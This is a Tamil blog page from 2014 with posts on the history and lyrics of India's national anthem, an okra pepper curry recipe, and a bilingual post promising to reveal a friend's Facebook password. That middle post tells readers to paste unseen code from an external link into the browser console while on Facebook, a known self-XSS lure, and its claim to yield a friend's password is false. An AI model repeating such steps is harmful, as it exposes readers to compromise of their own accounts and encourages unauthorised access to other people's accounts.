Monday, May 19, 2014
"ஜன கன மண' & "வந்தேமாதரம்'
மரியாதைக்குரியவர்களே,
வணக்கம்.
ஜன கண மன... நமது இந்திய நாட்டுப் பண் ஆகும்
இப்பாடலை 52 விநாடிகளுக்குள் பாடி முடிக்க வேண்டும்.
1911-ம் ஆண்டு டிசம்பர் 27-ம் தேதிதான் முதன்முதலாக கல்கத்தா நகரில் இந்திய தேசிய காங்கிரஸ் மாநாடு நடக்கும்போது "ஜன கன மண' பாடல் பாடப்பட்டது.தாகூரின் உறவினரான சரளாதேவி சௌதுராணி இந்தப் பாடலைப் பாடினார்.
1950-ம் ஆண்டு ஜனவரியில்தான் "ஜன கன மண' இந்தியாவின் தேசிய கீதமாகவும் "வந்தேமாதரம்' தேசியப் பாடலாகவும் இந்தியாவின் முதல் குடியரசுத் தலைவர் டாக்டர் இராஜேந்திர பிரசாத்தால் அறிவிக்கப்பட்டது.
ஜன கண மன அதிநாயக ஜெய ஹே பாரத பாக்ய விதாதா. பஞ்சாப சிந்து குஜராத்த மராட்டா திராவிட உத்கல வங்கா. விந்திய இமாச்சல யமுனா கங்கா உச்சல ஜலதி தரங்கா. தவ ஷுப நாமே ஜாகே, தவ ஷுப ஆஷிஷ மாகே, காஹே தவ ஜெய காதா. ஜன கண மங்கள தாயக ஜெயஹே பாரத பாக்ய விதாதா. ஜெய ஹே, ஜெய ஹே, ஜெய ஹே, ஜெய ஜெய ஜெய, ஜெய ஹே.
தமிழக அரசின் அதிகாரப்பூர்வ மொழி பெயர்ப்பான இது அரசு பாடநூல்களில் பயன்படுத்தப்படுகின்றது:

இந்தியத் தாயே! மக்களின் இன்ப துன்பங்களைக் கணிக்கின்ற
நின் திருப்பெயர் பஞ்சாபையும், சிந்துவையும், கூர்ச்சரத்தையும்
- நீயே எல்லாருடைய மனத்திலும் ஆட்சி செய்கிறாய்.
நின் திருப்பெயர் விந்திய, இமய மலைத் தொடர்களில்
- மராட்டியத்தையும், திராவிடத்தையும், ஒரிசாவையும்.
- வங்காளத்தையும், உள்ளக் கிளர்ச்சி அடையச் செய்கிறது.
அவை நின்னருளை வேண்டுகின்றன; நின் புகழைப் பரவுகின்றன.
- எதிரொ லிக்கிறது; யமுனை, கங்கை ஆறுகளின்
- இன்னொலியில் ஒன்றுகிறது; இந்தியக் கடலலைகளால்
- வணங்கப்படுகிறது.
இந்தியாவின் இன்ப துன்பங்களைக் கணிக்கின்ற தாயே. உனக்கு
- வெற்றி! வெற்றி! வெற்றி!
Sunday, May 4, 2014
உங்கள் நண்பர் FB யின் பாஸ்வேடினை அறிவது எப்படி ?
How to Hack Frinds FB Account- 2014 (Working Tricks)
உங்கள் நண்பர் FB யின் பாஸ்வேடினை அறிவது எப்படி ?
1. Copy all the code here -- http://txt.do/raqg
2. Go back to www.facebook.com ur Frnd Page
3. Press Ctrl+Shift+J if you are using Google Chrome
---Press Ctrl+Shift+K if you are using Mozilla Firefox
4. Click Console
5. Paste all the code on the console box / space provided .
6. Press Enter & Enjoy
தமிழில் ...
1. http://txt.do/raqg - இந்த லிங்கில் சென்று அனைத்து கோடிங்கையும் காப்பி செய்யவும்
2. பின்னர் facebook பக்கத்தில் நீங்கள் ஹெக் செய்ய விரும்பும் நண்பர் பக்கத்திற்கு செய்யவும்
3. அடுத்து,
-----நீங்கள் Google Chrome உலாவியை பயன்படுத்தினால் கிபோட்டில் Ctrl+Shift+J யை அழுத்தவும்.
-----நீங்கள் Mozilla Firefox உலாவியை பயன்படுத்தினால் கிபோட்டில் Ctrl+Shift+K யை அழுத்தவும்.
4. அதில் வரும் Console என்பதை கிளிக் செய்யுங்கள்
5. console box / அல்லது அந்த இடைவெளியில் நீங்கள் காப்பி செய்ததை பேஸ்ட் செய்யவும் (கீபோட்டில் Ctrl+V என்ற சோட்கட்டை உபயோகிக்கலாம்)
6. பின்னர் கீபோட்டில் உள்ள Enter key யை தட்டிவிட்டு பின்னர் வரும் ஓகே பட்டனை அழுத்தவும்.
(பாஸ்வேட் உங்கள் மெசேஜில் வர ஒரு நிமிடங்கள் வரை ஆகலாம். காத்திருக்கவும். வராவிடின் பக்கத்தை Refress செய்யவும். )

Thursday, May 1, 2014
வெண்டைகாய் மிளகு குழம்பு
தேவையான பொருட்கள்:
வெண்டைக்காய் பிஞ்சாக -150கிராம்,
தக்காளி பழம்-4,
வரமிளகாய்-8,
மிளகு-1,ஸ்பூன்,
தேங்காய் துருவல்-1-கப்,
புளித்தண்ணீர்-1//2 கப்,
வெல்லம் சிறியக்கட்டி,
கடுகு,பெருங்காயம்,1/4 ஸ்பூன்,
உப்பு தேவையான அள்வு.
செய்முறை:
வெணடைக்காயை சாம்பாருக்கு நறுக்குவது போல் நறுக்கவும். தக்காளியை பொடியாக நறுக்கவும். வாணலியில் தேங்காயை சிவப்பாக வறுத்து அதனுடன் மிளகாய், மிளகு இவற்றையும வறுத்து, கரகரப்பாக அரைத்து கொள்ளவும். அதே வாணலியில் 1-ஸ்பூன் எண்ணெய் ஊற்றி வெண்டைகாயை வதக்கி சிறிது நேரம் கழித்து தக்காளியையும் போட்டு நன்கு வதக்கி கொண்டு உப்பை சேர்த்து வதக்கவும். பின், அரைத்து வைத்துள்ளதை போட்டு கொஞ்ச நேரம் வதக்கி புளித்தண்ணீரை ஊற்றி, வெல்லம் போட்டு நன்கு கொதித்த பிறகு இறக்கி கடுகு, பெருங்காயம் தாளித்துவிட்டு, கறிவேப்பிலை, மல்லி இலை போடவும்.
ALL INDIA DRIVERS DAY-அனைத்திந்திய சாரதிகள் தினம்
Subscribe to:
Posts (Atom)